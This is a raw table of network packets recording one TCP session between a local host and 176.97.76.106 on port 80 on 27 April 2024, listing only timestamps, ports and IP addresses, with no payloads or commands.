Apr 27, 2024 00:46:06.812017918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812052965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812062025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812089920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812093019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812125921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812153101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812187910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812195063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812223911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812230110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812259912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812261105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812297106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812302113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812335014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812344074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812371016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812371969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812407970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812412024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812443972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812448025 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812489986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812489033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812529087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812530994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812565088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812570095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812599897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812603951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812637091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812658072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812686920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812689066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812722921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812726021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812760115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812761068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812796116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812799931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812832117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812836885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812868118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812872887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812905073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812906027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812942028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.812943935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812980890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.812980890 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813016891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813016891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813052893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813055992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813088894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813096046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813124895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813129902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813162088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813165903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813198090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813200951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813234091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813240051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813271046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813273907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813307047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813313007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813343048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813349009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813380003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813384056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813416004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813419104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813451052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813469887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813487053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813491106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813524961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813528061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813564062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813564062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813600063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813601971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813637972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813638926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813673019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813678026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813709021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813713074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813745022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813750982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813781977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813783884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813817978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813822031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813853025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813858032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813889980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813890934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813925028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813925982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813961029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813965082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.813997030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.813999891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.814033985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.814035892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.814073086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.814074039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.814109087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.814111948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.814145088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.814146042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.814179897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.814182043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.814213037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.814215899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.814270973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.814948082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.814985037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.814986944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815021038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815026045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815057039 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815058947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815094948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815527916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815567017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815574884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815603971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815604925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815643072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815645933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815680981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815684080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815716982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815720081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815752983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815757990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815789938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.815793991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.815829992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816040993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816077948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816083908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816116095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816133976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816169977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816175938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816206932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816210032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816243887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816246986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816281080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816282988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816318035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816319942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816354990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816420078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816457033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816462040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816493988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816514969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816534042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816534042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816574097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816879034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816915989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816917896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816952944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816963911 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.816988945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.816994905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817028999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817059040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817097902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817126989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817162991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817164898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817202091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817203045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817241907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817460060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817502022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817529917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817567110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817569017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817604065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817604065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817640066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817641020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817675114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817677021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817713022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817719936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817749023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817749977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817790985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.817946911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817985058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.817986012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818020105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818022013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818058014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818058014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818095922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818115950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818130970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818133116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818170071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818172932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818206072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818208933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818239927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818274975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818311930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818312883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818345070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818350077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818387985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818387985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818424940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818427086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818460941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818464994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818497896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818497896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818535089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818546057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818572044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818573952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818608999 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818610907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818648100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818651915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818685055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818686962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818722963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818726063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818762064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818794012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818830013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818831921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818869114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818901062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818938971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818941116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.818975925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.818975925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819011927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819034100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819047928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819050074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819083929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819086075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819122076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819124937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819159031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819160938 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819195986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819199085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819231987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819236994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819267988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819272041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819304943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819307089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819341898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819344997 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819377899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819380045 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819416046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819416046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819452047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819454908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819489002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819492102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819524050 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819525957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819561958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819566011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819597006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819597960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819631100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819633007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819669008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819669008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819705963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819709063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819744110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819746971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819780111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819782972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819816113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819839001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819852114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819855928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819888115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819891930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819925070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819926977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819962978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.819967031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819999933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.819999933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820036888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820040941 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820074081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820077896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820107937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820128918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820164919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820168972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820202112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820202112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820240021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820242882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820276022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820280075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820310116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820312023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820348978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820349932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820384979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820389032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820422888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820427895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820461035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.820463896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820497036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.820497036 CEST	80	49734	176.97.76.106	192.168.2.4
